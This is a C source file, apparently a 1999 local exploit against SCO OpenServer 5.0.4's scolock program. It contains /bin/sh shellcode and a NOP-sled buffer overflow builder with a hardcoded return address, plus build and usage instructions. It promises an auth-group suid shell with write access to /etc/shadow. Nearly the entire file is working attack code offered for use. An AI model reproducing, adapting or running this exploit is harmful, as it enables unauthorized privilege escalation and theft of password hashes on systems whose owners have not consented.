/*
 * <scolockx.c> Local exploit - Gives you an auth group suid shell 
 *
 * h0h0h0!! auth group has read/write access to /etc/shadow (w3 4r3 r00t!) 
 *
 * $ ls -al /etc/shadow
 * -rw-rw----   1 root     auth         323 Jun 14 23:09 /etc/shadow
 *
 * Offset: scolockx (SCO OpenServer 5.0.4)
 * 0 -> with -display parameter
 *
 * Usage: 
 * $ cc scolockx.c -o scolockx
 * $ /usr/bin/X11/scolock -display 1.1.1.1:0 -bg `scolockx 0`
 *
 * Note: scolock need to be run from a valid x-display
 *
 * By: The Dark Raver of CPNE (Murcia/Spain - 28/6/99) 
 *
 * <http://members.tripod.com/~ochodedos> - <doble@iname.com>
 *
 */ 


#include <stdlib.h>
#include <stdio.h>

char hell[]=
"\xeb\x16" // start: jmp uno 
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x53" // pushl %ebx
"\x53" // pushl %ebx 
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe5\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 
                                 
                       
#define OFF 0x8047a98 	// SCO OpenServer 5.0.4
#define ALINEA 0
#define LEN 2000
                       

int main(int argc, char *argv[]) {

int offset=0;
char buf[LEN];
int i;

if(argc < 2) {
	printf("Usage: scolockx <offset>\n");
	exit(0); }
else {
	offset=atoi(argv[1]); }

memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i<LEN-4;i+=4)
	*(int *)&buf[i]=OFF+offset;

for(i=0;i<LEN;i++)
	putchar(buf[i]);

exit(0);
}